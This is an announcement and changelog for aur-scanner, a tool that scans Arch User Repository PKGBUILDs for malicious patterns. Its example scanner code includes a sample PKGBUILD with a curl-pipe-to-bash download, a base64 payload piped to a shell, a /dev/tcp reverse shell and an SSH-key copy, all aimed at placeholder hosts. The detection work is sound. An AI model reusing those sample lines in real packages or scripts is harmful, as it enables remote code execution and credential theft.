
Introducing aur-scanner: A Security Scanner for AUR Packages
We released `aur-scanner` today - a tool that scans AUR packages for malicious patterns before installation.

Now available on the Arch User Repository.
Background
The Arch User Repository relies on users manually reviewing PKGBUILDs before installation. This works when packages are simple, but modern PKGBUILDs can be complex, and obfuscation techniques make malicious code difficult to spot.
Recent incidents have highlighted the risks:
- July 2025: Packages like `librewolf-fix-bin` and `firefox-patch-bin` were found distributing CHAOS RAT malware.
- 2018: Orphaned packages including `acroread` were hijacked to deploy cryptominers.
We wanted a tool that could automate the initial review process.
What It Does
aur-scanner performs static analysis on PKGBUILD files to flag known malicious patterns:
- Download-and-execute attacks (curl/wget piped to shell)
- Reverse shells and backdoors
- Credential access (SSH keys, browser profiles)
- Obfuscation (base64, hex encoding, eval)
- Privilege escalation patterns
It includes 50+ detection rules based on documented attacks against the AUR.
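To make the kind of pattern-based static analysis described above concrete, here is a small rule set and scanner added for this post. It is illustrative code, not aur-scanner's own rule engine: the `EX-*` rule IDs, the regexes and the sample PKGBUILD are all constructed for the example, and the hostnames and IP address in the sample are reserved documentation values, not real infrastructure.

```python
import re

# Constructed sample PKGBUILD for this example. example.invalid and 198.51.100.7
# are reserved documentation values; this is not a real AUR package.
SAMPLE_PKGBUILD = r"""pkgname=example-bin
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-1.0.tar.gz")
sha256sums=('SKIP')

build() {
  curl -fsSL https://example.invalid/setup.sh | bash
  echo "aGVsbG8=" | base64 -d | sh
  eval "$(printf '\x65\x63\x68\x6f hi')"
}

package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
  bash -i >& /dev/tcp/198.51.100.7/4444 0>&1
  cp -r ~/.ssh "$pkgdir/opt/example/"
}
"""

# Illustrative rules: (code, severity, description, regex). The EX-* codes are
# invented for this example and are not aur-scanner's detection codes.
RULES = [
    ("EX-DL-001", "High", "download piped straight into a shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("EX-RS-001", "High", "bash /dev/tcp reverse shell",
     re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("EX-OB-001", "Medium", "base64-decoded data piped into a shell",
     re.compile(r"base64\s+(-d|--decode)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("EX-OB-002", "Medium", "eval of a quoted or command-substituted string",
     re.compile(r"\beval\s+[\"'$]")),
    ("EX-OB-003", "Medium", "run of hex escapes (obfuscated string)",
     re.compile(r"(\\x[0-9A-Fa-f]{2}){4,}")),
    ("EX-CR-001", "High", "reads SSH keys or browser profiles",
     re.compile(r"(~|\$HOME)/\.(ssh|mozilla|config/(chromium|google-chrome))\b")),
]

SEVERITY_RANK = {"Medium": 1, "High": 2}


def scan_pkgbuild(text):
    """Return a list of (line_no, code, severity, description, line) findings."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        # Whole-line comments never execute; trailing comments are still scanned.
        if not stripped or stripped.startswith("#"):
            continue
        for code, severity, desc, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, code, severity, desc, stripped))
    return findings


def highest_severity(findings):
    """Worst severity seen across the findings, or None for a clean file."""
    return max((f[2] for f in findings), key=SEVERITY_RANK.get, default=None)


if __name__ == "__main__":
    results = scan_pkgbuild(SAMPLE_PKGBUILD)
    for lineno, code, severity, desc, line in results:
        print(f"line {lineno}: [{severity}] {code} {desc}: {line}")
    print("verdict:", highest_severity(results) or "clean")
```

Run against the sample, this flags six findings across five lines (the `eval` line trips both the eval and hex-escape rules). The same limitation the post describes applies here: each rule matches a literal shape, so a command assembled from variables or split across `$()` substitutions would pass untouched, which is why a tool like this is a first filter rather than a substitute for reading the PKGBUILD.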
Usage
# Install from AUR
paru -S aur-scanner-git
# Check a package before installing
aur-scan check <package-name>
# Scan a local PKGBUILD
aur-scan scan ./PKGBUILD
The tool also integrates as a pacman hook for automatic scanning during package transactions.
Limitations
This is static analysis: it catches known patterns but won't detect novel attacks or sophisticated obfuscation (for example, a command assembled from variables at runtime). It is meant to complement manual review, not replace it. Note also that makepkg runs the PKGBUILD's prepare(), build() and package() functions before pacman ever sees the resulting package, so a pacman hook can only act at install time, after any build-time code has already executed; scanning with `aur-scan check` or `aur-scan scan` before building is the earlier line of defense.
Links
- AUR: aur-scanner-git
- GitHub: KiefStudioMA/ks-aur-scanner
- License: GPL-3.0-or-later
Feedback and contributions welcome via GitHub issues.
Kief Studio - https://kief.studio
Changelog
aur-scanner v0.1.1: VCS Checksum Handling & Stable Releases
Released December 3, 2025
Version 0.1.1 addresses a false positive issue with VCS sources and introduces stable release packages on the AUR.
What's New
VCS Checksum Detection Fix
The scanner now correctly handles SKIP checksums for VCS sources (git, svn, hg, bzr). Previously, packages using git sources would trigger checksum warnings even though SKIP is the correct and expected value for VCS sources - their content changes with each clone.
Before: A package like this would trigger a warning:
source=("git+https://github.com/user/repo.git")
sha256sums=('SKIP')
After: VCS sources with SKIP are correctly recognized as legitimate. Only non-VCS sources (tarballs, patches) using SKIP will trigger warnings.
New Stable Release Packages
We've added checksum-validated stable release packages to the AUR:
| Package | Description |
|---|---|
| aur-scanner | Stable release with SHA256 validation |
| ks-aur-scanner | Alternate name, same stable release |
| aur-scanner-git | Development version (existing) |
The stable packages download from tagged GitHub releases with verified checksums, while the -git package tracks the latest commits.
Detection Code Updates
New checksum-related detection codes:
- CHK-001: No checksums for sources (High)
- CHK-002: MD5 checksums used (Medium)
- CHK-003: SHA1 checksums used (Medium)
- CHK-004: Some non-VCS sources use SKIP (Medium)
- CHK-005: All non-VCS sources use SKIP (High)
- CHK-006: Checksum count mismatch (High)
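As an added example covering both the VCS SKIP handling described above and the CHK codes listed here, the following Python is written for this post rather than taken from aur-scanner. It reuses the page's CHK codes and severities, but the array parser, the `is_vcs_source` helper and the sample PKGBUILD fragments are my own constructions. A source counts as VCS when its protocol prefix (the part before `+` or `://`, after any `name::` rename) is git, svn, hg or bzr, which is how makepkg identifies VCS sources; fossil is included as well because makepkg supports it, which goes one step beyond the four the changelog names.

```python
import re
import shlex

# Protocol prefixes makepkg treats as VCS sources, for which SKIP is expected.
VCS_PROTOCOLS = {"git", "svn", "hg", "bzr", "fossil"}
SUM_ARRAYS = {"md5sums", "sha1sums", "sha224sums", "sha256sums",
              "sha384sums", "sha512sums", "b2sums"}

# Matches bash array assignments such as source=(...) or sha256sums_x86_64=(...),
# including multi-line bodies. The body match is non-greedy, so a literal ')'
# inside an entry would truncate it: fine for this example, not for hostile input.
ARRAY_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)=\((.*?)\)\s*$",
                      re.MULTILINE | re.DOTALL)


def is_vcs_source(entry):
    """True when the source entry uses a VCS protocol (after any 'name::' rename)."""
    url = entry.split("::", 1)[1] if "::" in entry else entry
    proto = url.split("://", 1)[0]
    return proto.split("+", 1)[0] in VCS_PROTOCOLS


def parse_arrays(text):
    """Collect every array in the PKGBUILD, folding arch suffixes into the base name."""
    arrays = {}
    for name, body in ARRAY_RE.findall(text):
        base = name.split("_", 1)[0]          # sha256sums_x86_64 -> sha256sums
        # shlex drops '#' comments; an unquoted '#tag=' fragment would be cut too,
        # but the protocol prefix used for VCS detection survives either way.
        arrays.setdefault(base, []).extend(shlex.split(body, comments=True))
    return arrays


def check_checksums(text):
    """Return (code, severity, message) findings using the CHK codes from the changelog."""
    arrays = parse_arrays(text)
    sources = arrays.get("source", [])
    sums = {n: v for n, v in arrays.items() if n in SUM_ARRAYS}
    findings = []
    if not sources:
        return findings
    if not sums:
        return [("CHK-001", "High", "no checksums for sources")]
    if "md5sums" in sums:
        findings.append(("CHK-002", "Medium", "MD5 checksums used"))
    if "sha1sums" in sums:
        findings.append(("CHK-003", "Medium", "SHA1 checksums used"))
    non_vcs = [s for s in sources if not is_vcs_source(s)]
    for name, values in sums.items():
        if len(values) != len(sources):
            findings.append(("CHK-006", "High",
                             f"{name} has {len(values)} entries for {len(sources)} sources"))
            continue
        # SKIP is only suspicious on sources whose content is meant to be fixed.
        skipped = [s for s, c in zip(sources, values)
                   if c.upper() == "SKIP" and not is_vcs_source(s)]
        if non_vcs and len(skipped) == len(non_vcs):
            findings.append(("CHK-005", "High", f"all non-VCS sources use SKIP in {name}"))
        elif skipped:
            findings.append(("CHK-004", "Medium",
                             f"non-VCS sources use SKIP in {name}: " + ", ".join(skipped)))
    return findings


# Constructed PKGBUILD fragments for the example; none is a real AUR package and
# the sha256 value is a placeholder, not a real digest.
VCS_ONLY = """source=("git+https://github.com/user/repo.git")
sha256sums=('SKIP')
"""
MIXED = """source=("example-1.0.tar.gz::https://example.invalid/example-1.0.tar.gz"
        "fix-build.patch"
        "helper::git+https://github.com/user/helper.git")
sha256sums=('SKIP'
            '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
            'SKIP')
"""
ALL_SKIP = """source=("https://example.invalid/example-1.0.tar.gz")
md5sums=('SKIP')
"""
MISMATCH = """source=("example-1.0.tar.gz" "fix-build.patch")
sha256sums=('SKIP')
"""
NO_SUMS = """source=("https://example.invalid/example-1.0.tar.gz")
"""

if __name__ == "__main__":
    for label, text in [("vcs-only", VCS_ONLY), ("mixed", MIXED),
                        ("all-skip", ALL_SKIP), ("mismatch", MISMATCH), ("no-sums", NO_SUMS)]:
        print(label, check_checksums(text) or "clean")
```

The VCS-only fragment is the exact "before" case from the changelog and now yields no findings; the mixed fragment shows why CHK-004 has to be evaluated per position, since the tarball's SKIP is the problem while the git source's SKIP is correct.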
Installation
# Stable release (recommended)
paru -S aur-scanner
# or
yay -S aur-scanner
# Development version
paru -S aur-scanner-git
# or
yay -S aur-scanner-git
Links
- GitHub: KiefStudioMA/ks-aur-scanner
- AUR: aur-scanner